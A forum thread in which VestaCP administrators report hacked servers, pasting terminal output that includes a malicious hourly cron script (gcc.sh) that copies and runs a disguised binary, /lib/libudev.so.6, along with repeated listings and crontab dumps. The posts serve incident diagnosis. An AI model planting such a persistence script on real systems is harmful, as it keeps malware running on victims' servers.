We are happy to announce that Vesta is back under active development as of 25 February 2024. We are working on v1 candidate and expect to engage more with the community over the coming months. We are committed to open source, and we encourage contributors to help us build the future of Vesta.
Got 10 VestaCP servers exploited
-
- Posts: 73
- Joined: Sun Dec 03, 2017 6:30 pm
Re: Got 10 VestaCP servers exploited
as i said, i took backup before breach and reinstalled all servers.
Re: Got 10 VestaCP servers exploited
ls -tl /usr/bin | less
cat /etc/cron.hourly/gcc.sh
SpoilerShow
for i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done
cp /lib/libudev.so /lib/libudev.so.6
/lib/libudev.so.6
[root@waterleafshop public_html]# ll /etc/init.d/
итого 48
-rw-r--r-- 1 root root 17500 май 3 2017 functions
-rwxr-xr-x 1 root root 4334 май 3 2017 netconsole
-rwxr-xr-x 1 root root 7293 май 3 2017 network
-rw-r--r-- 1 root root 1160 мар 7 07:27 README
-rwxr-xr-x 1 root admin 295 апр 5 10:50 update
-rwxr-xr-x 1 root root 2074 янв 10 06:25 vesta
[root@waterleafshop public_html]# clamscan -r -i /usr
-bash: clamscan: команда не найдена
[root@waterleafshop public_html]# ll /etc/cron.hourly/
итого 12
-rwxr-xr-x 1 root root 392 авг 3 2017 0anacron
-rwxr-x--- 1 root root 172 янв 8 08:27 awstats
-rwxr-xr-x 1 root admin 228 апр 5 10:50 gcc.sh
[root@waterleafshop public_html]# cat /etc/cron.hourly/gcc.sh
#!/bin/sh
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin
for i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done
cp /lib/libudev.so /lib/libudev.so.6
/lib/libudev.so.6
[root@waterleafshop public_html]# cat /etc/cron.hourly/0anacron
#!/bin/sh
# Check whether 0anacron was run today already
if test -r /var/spool/anacron/cron.daily; then
day=`cat /var/spool/anacron/cron.daily`
fi
if [ `date +%Y%m%d` = "$day" ]; then
exit 0;
fi
# Do not run jobs when on battery power
if test -x /usr/bin/on_ac_power; then
/usr/bin/on_ac_power >/dev/null 2>&1
if test $? -eq 1; then
exit 0
fi
fi
/usr/sbin/anacron -s
[root@waterleafshop public_html]# ls -tl /usr/bin | less
[root@waterleafshop public_html]# ls -tl /usr/bin | less
[6]+ Stopped ls --color=auto -tl /usr/bin | less
[root@waterleafshop public_html]# clear
[root@waterleafshop public_html]# ls -tl /usr/bin | less
-rwxr-xr-x 1 root root 48451 июн 9 2014 zipdetails
-rwxr-xr-x. 1 root root 19568 июн 9 2014 last
-rwxr-xr-x. 1 root root 11240 июн 9 2014 mesg
-r-xr-sr-x. 1 root tty 15344 июн 9 2014 wall
-rwxr-xr-x 1 root root 167272 июн 9 2014 aspell
-rwxr-xr-x 1 root root 11320 июн 9 2014 prezip-bin
-rwxr-xr-x 1 root root 11296 июн 9 2014 word-list-compress
-rwxr-xr-x 1 root root 988 июн 9 2014 ispell
-rwxr-xr-x 1 root root 122 июн 9 2014 spell
-rwxr-xr-x 1 root root 5656 июн 9 2014 precat
-rwxr-xr-x 1 root root 5656 июн 9 2014 preunzip
-rwxr-xr-x 1 root root 5656 июн 9 2014 prezip
-rwxr-xr-x 1 root root 85 июн 9 2014 run-with-aspell
-rwxr-xr-x. 1 root root 2086 июн 9 2014 run-parts
-rwxr-xr-x. 1 root root 19688 июн 9 2014 pkla-admin-identities
-rwxr-xr-x. 1 root root 27960 июн 9 2014 pkla-check-authorization
-rwxr-xr-x. 1 root root 45448 июн 9 2014 pkg-config
-rwxr-xr-x 1 root root 329664 июн 9 2014 flex
-rwxr-xr-x. 1 root root 15768 июн 9 2014 hostname
-rwxr-xr-x. 1 root root 30488 июн 9 2014 testgdbm
-rwxr-xr-x. 1 root root 37528 июн 9 2014 catman
-rwxr-xr-x. 1 root root 87024 июн 9 2014 lexgrog
-rwxr-xr-x. 1 root root 102736 июн 9 2014 man
-rwxr-xr-x. 1 root root 125088 июн 9 2014 mandb
-rwxr-xr-x. 1 root root 33224 июн 9 2014 manpath
-rwxr-xr-x. 1 root root 46456 июн 9 2014 whatis
-rwxr-xr-x 1 root root 40824 июн 9 2014 recode
-rwxr-xr-x. 1 root root 147880 июн 9 2014 eqn
-rwxr-xr-x. 1 root root 83584 июн 9 2014 groff
-rwxr-xr-x. 1 root root 144232 июн 9 2014 grops
-rwxr-xr-x. 1 root root 100952 июн 9 2014 grotty
-rwxr-xr-x. 1 root root 184736 июн 9 2014 pic
-rwxr-xr-x. 1 root root 192048 июн 9 2014 post-grohtml
-rwxr-xr-x. 1 root root 41864 июн 9 2014 preconv
-rwxr-xr-x. 1 root root 88312 июн 9 2014 pre-grohtml
-rwxr-xr-x. 1 root root 33368 июн 9 2014 soelim
-rwxr-xr-x. 1 root root 118744 июн 9 2014 tbl
-rwxr-xr-x. 1 root root 525272 июн 9 2014 troff
-rwxr-xr-x. 1 root root 3392 июн 9 2014 nroff
-rwxr-xr-x. 1 root root 271 июн 9 2014 neqn
-rwxr-xr-x 1 root root 13581 июн 9 2014 pod2man
-rwxr-xr-x 1 root root 11004 июн 9 2014 pod2text
-rwxr-xr-x 1 root root 83424 июн 9 2014 bc
-rwxr-xr-x 1 root root 45392 июн 9 2014 dc
-rwxr-xr-x 1 root root 3724 фев 3 2014 ipcount
-rwxr-xr-x 1 root root 982 фев 3 2014 iptab
-rwxr-xr-x 1 root root 2953 окт 10 2008 zipgrep
cp /lib/libudev.so /lib/libudev.so.6
/lib/libudev.so.6
[root@waterleafshop public_html]# ll /etc/init.d/
итого 48
-rw-r--r-- 1 root root 17500 май 3 2017 functions
-rwxr-xr-x 1 root root 4334 май 3 2017 netconsole
-rwxr-xr-x 1 root root 7293 май 3 2017 network
-rw-r--r-- 1 root root 1160 мар 7 07:27 README
-rwxr-xr-x 1 root admin 295 апр 5 10:50 update
-rwxr-xr-x 1 root root 2074 янв 10 06:25 vesta
[root@waterleafshop public_html]# clamscan -r -i /usr
-bash: clamscan: команда не найдена
[root@waterleafshop public_html]# ll /etc/cron.hourly/
итого 12
-rwxr-xr-x 1 root root 392 авг 3 2017 0anacron
-rwxr-x--- 1 root root 172 янв 8 08:27 awstats
-rwxr-xr-x 1 root admin 228 апр 5 10:50 gcc.sh
[root@waterleafshop public_html]# cat /etc/cron.hourly/gcc.sh
#!/bin/sh
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin
for i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done
cp /lib/libudev.so /lib/libudev.so.6
/lib/libudev.so.6
[root@waterleafshop public_html]# cat /etc/cron.hourly/0anacron
#!/bin/sh
# Check whether 0anacron was run today already
if test -r /var/spool/anacron/cron.daily; then
day=`cat /var/spool/anacron/cron.daily`
fi
if [ `date +%Y%m%d` = "$day" ]; then
exit 0;
fi
# Do not run jobs when on battery power
if test -x /usr/bin/on_ac_power; then
/usr/bin/on_ac_power >/dev/null 2>&1
if test $? -eq 1; then
exit 0
fi
fi
/usr/sbin/anacron -s
[root@waterleafshop public_html]# ls -tl /usr/bin | less
[root@waterleafshop public_html]# ls -tl /usr/bin | less
[6]+ Stopped ls --color=auto -tl /usr/bin | less
[root@waterleafshop public_html]# clear
[root@waterleafshop public_html]# ls -tl /usr/bin | less
-rwxr-xr-x 1 root root 48451 июн 9 2014 zipdetails
-rwxr-xr-x. 1 root root 19568 июн 9 2014 last
-rwxr-xr-x. 1 root root 11240 июн 9 2014 mesg
-r-xr-sr-x. 1 root tty 15344 июн 9 2014 wall
-rwxr-xr-x 1 root root 167272 июн 9 2014 aspell
-rwxr-xr-x 1 root root 11320 июн 9 2014 prezip-bin
-rwxr-xr-x 1 root root 11296 июн 9 2014 word-list-compress
-rwxr-xr-x 1 root root 988 июн 9 2014 ispell
-rwxr-xr-x 1 root root 122 июн 9 2014 spell
-rwxr-xr-x 1 root root 5656 июн 9 2014 precat
-rwxr-xr-x 1 root root 5656 июн 9 2014 preunzip
-rwxr-xr-x 1 root root 5656 июн 9 2014 prezip
-rwxr-xr-x 1 root root 85 июн 9 2014 run-with-aspell
-rwxr-xr-x. 1 root root 2086 июн 9 2014 run-parts
-rwxr-xr-x. 1 root root 19688 июн 9 2014 pkla-admin-identities
-rwxr-xr-x. 1 root root 27960 июн 9 2014 pkla-check-authorization
-rwxr-xr-x. 1 root root 45448 июн 9 2014 pkg-config
-rwxr-xr-x 1 root root 329664 июн 9 2014 flex
-rwxr-xr-x. 1 root root 15768 июн 9 2014 hostname
-rwxr-xr-x. 1 root root 30488 июн 9 2014 testgdbm
-rwxr-xr-x. 1 root root 37528 июн 9 2014 catman
-rwxr-xr-x. 1 root root 87024 июн 9 2014 lexgrog
-rwxr-xr-x. 1 root root 102736 июн 9 2014 man
-rwxr-xr-x. 1 root root 125088 июн 9 2014 mandb
-rwxr-xr-x. 1 root root 33224 июн 9 2014 manpath
-rwxr-xr-x. 1 root root 46456 июн 9 2014 whatis
-rwxr-xr-x 1 root root 40824 июн 9 2014 recode
-rwxr-xr-x. 1 root root 147880 июн 9 2014 eqn
-rwxr-xr-x. 1 root root 83584 июн 9 2014 groff
-rwxr-xr-x. 1 root root 144232 июн 9 2014 grops
-rwxr-xr-x. 1 root root 100952 июн 9 2014 grotty
-rwxr-xr-x. 1 root root 184736 июн 9 2014 pic
-rwxr-xr-x. 1 root root 192048 июн 9 2014 post-grohtml
-rwxr-xr-x. 1 root root 41864 июн 9 2014 preconv
-rwxr-xr-x. 1 root root 88312 июн 9 2014 pre-grohtml
-rwxr-xr-x. 1 root root 33368 июн 9 2014 soelim
-rwxr-xr-x. 1 root root 118744 июн 9 2014 tbl
-rwxr-xr-x. 1 root root 525272 июн 9 2014 troff
-rwxr-xr-x. 1 root root 3392 июн 9 2014 nroff
-rwxr-xr-x. 1 root root 271 июн 9 2014 neqn
-rwxr-xr-x 1 root root 13581 июн 9 2014 pod2man
-rwxr-xr-x 1 root root 11004 июн 9 2014 pod2text
-rwxr-xr-x 1 root root 83424 июн 9 2014 bc
-rwxr-xr-x 1 root root 45392 июн 9 2014 dc
-rwxr-xr-x 1 root root 3724 фев 3 2014 ipcount
-rwxr-xr-x 1 root root 982 фев 3 2014 iptab
-rwxr-xr-x 1 root root 2953 окт 10 2008 zipgrep
SpoilerShow
cat /etc/cron.hourly/gcc.sh
#!/bin/sh
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin
for i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done
cp /lib/libudev.so /lib/libudev.so.6
/lib/libudev.so.6
#!/bin/sh
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin
for i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done
cp /lib/libudev.so /lib/libudev.so.6
/lib/libudev.so.6
SpoilerShow
# cat /etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
# For details see man 4 crontabs
# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
# For details see man 4 crontabs
# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
Re: Got 10 VestaCP servers exploited
Code: Select all
# cat /opt/backup/etc/cron.hourly/gcc.sh
#!/bin/sh
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin
for i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done
cp /lib/libudev.so /lib/libudev.so.6
/lib/libudev.so.6
Code: Select all
# cat /opt/backup/etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
# For details see man 4 crontabs
# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
Code: Select all
# ls -tl /opt/backup/usr/bin | less
total 245832
lrwxrwxrwx 1 root root 38 Mar 30 15:17 npm -> ../lib/node_modules/npm/bin/npm-cli.js
lrwxrwxrwx 1 root root 38 Mar 30 15:17 npx -> ../lib/node_modules/npm/bin/npx-cli.js
lrwxrwxrwx 1 root root 9 Mar 30 15:16 phar -> phar.phar
-rwxr-xr-x 1 root root 33983272 Mar 30 07:10 node
-rwxr-xr-x 1 root root 204552 Mar 29 12:02 memcached
-rwxr-xr-x 1 root root 6110 Mar 29 02:06 memcached-tool
-rwxr-xr-x 1 root root 4935304 Mar 28 14:27 php
-rwxr-xr-x 1 root root 4828904 Mar 28 14:27 php-cgi
-rwxr-xr-x 1 root root 5120416 Mar 28 14:27 zts-php
-rwxr-xr-x 1 root root 14823 Mar 28 14:27 phar.phar
-rwxr-xr-x 1 root root 5475 Mar 28 14:27 php-config
-rwxr-xr-x 1 root root 4776 Mar 28 14:27 phpize
-rwxr-xr-x 1 root root 5659 Mar 28 14:26 zts-php-config
-rwxr-xr-x 1 root root 4788 Mar 28 14:26 zts-phpize
lrwxrwxrwx 1 root root 42 Mar 25 20:04 uglifyjs -> ../lib/node_modules/uglify-js/bin/uglifyjs
lrwxrwxrwx 1 root root 39 Mar 25 17:24 uglifycss -> ../lib/node_modules/uglifycss/uglifycss
lrwxrwxrwx 1 root root 11 Mar 25 17:07 audit2why -> audit2allow
lrwxrwxrwx 1 root root 3 Mar 25 15:46 twopi -> dot
lrwxrwxrwx 1 root root 3 Mar 25 15:46 sfdp -> dot
lrwxrwxrwx 1 root root 3 Mar 25 15:46 osage -> dot
lrwxrwxrwx 1 root root 3 Mar 25 15:46 patchwork -> dot
lrwxrwxrwx 1 root root 3 Mar 25 15:46 neato -> dot
lrwxrwxrwx 1 root root 6 Mar 25 15:46 gxl2dot -> gxl2gv
lrwxrwxrwx 1 root root 6 Mar 25 15:46 gv2gxl -> gxl2gv
lrwxrwxrwx 1 root root 6 Mar 25 15:46 dot2gxl -> gxl2gv
lrwxrwxrwx 1 root root 3 Mar 25 15:46 fdp -> dot
lrwxrwxrwx 1 root root 3 Mar 25 15:46 circo -> dot
lrwxrwxrwx 1 root root 21 Mar 25 14:02 jjs -> /etc/alternatives/jjs
lrwxrwxrwx 1 root root 25 Mar 25 14:02 keytool -> /etc/alternatives/keytool
lrwxrwxrwx 1 root root 22 Mar 25 14:02 orbd -> /etc/alternatives/orbd
lrwxrwxrwx 1 root root 25 Mar 25 14:02 pack200 -> /etc/alternatives/pack200
lrwxrwxrwx 1 root root 28 Mar 25 14:02 policytool -> /etc/alternatives/policytool
lrwxrwxrwx 1 root root 22 Mar 25 14:02 rmid -> /etc/alternatives/rmid
lrwxrwxrwx 1 root root 29 Mar 25 14:02 rmiregistry -> /etc/alternatives/rmiregistry
lrwxrwxrwx 1 root root 28 Mar 25 14:02 servertool -> /etc/alternatives/servertool
lrwxrwxrwx 1 root root 27 Mar 25 14:02 tnameserv -> /etc/alternatives/tnameserv
lrwxrwxrwx 1 root root 27 Mar 25 14:02 unpack200 -> /etc/alternatives/unpack200
lrwxrwxrwx 1 root root 22 Mar 25 14:02 java -> /etc/alternatives/java
lrwxrwxrwx 1 root root 4 Mar 23 20:56 lex -> flex
lrwxrwxrwx 1 root root 4 Mar 23 20:56 flex++ -> flex
lrwxrwxrwx 1 root root 3 Mar 23 20:56 pftp -> ftp
lrwxrwxrwx 1 root root 15 Mar 23 20:56 nail -> ../../bin/mailx
lrwxrwxrwx 1 root root 15 Mar 23 20:56 Mail -> ../../bin/mailx
lrwxrwxrwx 1 root root 5 Mar 23 20:56 mail -> mailx
lrwxrwxrwx 1 root root 7 Mar 23 20:56 dsync -> doveadm
lrwxrwxrwx 1 root root 9 Mar 23 20:56 webazolver -> webalizer
lrwxrwxrwx 1 root root 9 Mar 23 20:56 rrdcreate -> rrdupdate
lrwxrwxrwx 1 root root 9 Mar 23 20:56 rrdinfo -> rrdupdate
lrwxrwxrwx 1 root root 23 Mar 23 20:56 whois -> /etc/alternatives/whois
lrwxrwxrwx 1 root root 2 Mar 23 20:55 mcedit -> mc
-
- Posts: 73
- Joined: Sun Dec 03, 2017 6:30 pm
Re: Got 10 VestaCP servers exploited
Those posts do explain the virus and its removal. but even after removal it will eventually reappear again because we are still not aware of a vuln which is obviously present somewhere within the system.
Re: Got 10 VestaCP servers exploited
Hello,
Same thing here. Fresh install of Ubuntu 16 a week ago. Installed last version VestaCP and a Wordpress right after (no plugins), then on 7th April, server blocked by OVH for DDOS attack. Same IP as you guys in China.
My vesta install : Nginx + php-fpm, vsftpd, exim, iptables + fail2ban, MySQL DB and that's all.
Hope there will be a fix soon.
All my other servers running former version of VestaCP don't seem to be impacted, yet.
Same thing here. Fresh install of Ubuntu 16 a week ago. Installed last version VestaCP and a Wordpress right after (no plugins), then on 7th April, server blocked by OVH for DDOS attack. Same IP as you guys in China.
My vesta install : Nginx + php-fpm, vsftpd, exim, iptables + fail2ban, MySQL DB and that's all.
Hope there will be a fix soon.
All my other servers running former version of VestaCP don't seem to be impacted, yet.
Re: Got 10 VestaCP servers exploited
Once again, I copy the answer from my hoster, which I posted in another topiclukapaunovic wrote: ↑Sat Apr 07, 2018 7:01 pmThose posts do explain the virus and its removal. but even after removal it will eventually reappear again because we are still not aware of a vuln which is obviously present somewhere within the system.
I checked and I had the latest version of Roundcube 1.3.5. Unfortunately, the hoster did not provide access to an infected server to view other running processes.Одновременно с этим, однако судя по всему взлом был как-то связан с vesta и roundcube. Т.к. одновременно с Вашим возникли проблемы ещё на нескольких серверах наших клиентов в аналогичными симптомами. На этих серверах так же стояла Vesta и вредоносные процессы имели текущей рабочей директорией директорию roundcube, при этом дистрибутивы linux отличались.
-
- Posts: 73
- Joined: Sun Dec 03, 2017 6:30 pm
Re: Got 10 VestaCP servers exploited
Studiomax i was referring to dpeca links
-
- Posts: 73
- Joined: Sun Dec 03, 2017 6:30 pm
Re: Got 10 VestaCP servers exploited
Users are increasingly coming back to me reporting their servers are hacked :(
-
- Posts: 73
- Joined: Sun Dec 03, 2017 6:30 pm
Re: Got 10 VestaCP servers exploited
I think i can handle this.
there are MANY people MANY servers
this is CRAZY
OVH is stuborn and letting me backup some servers some don't
i'm gonna die.
\
there are MANY people MANY servers
this is CRAZY
OVH is stuborn and letting me backup some servers some don't
i'm gonna die.
\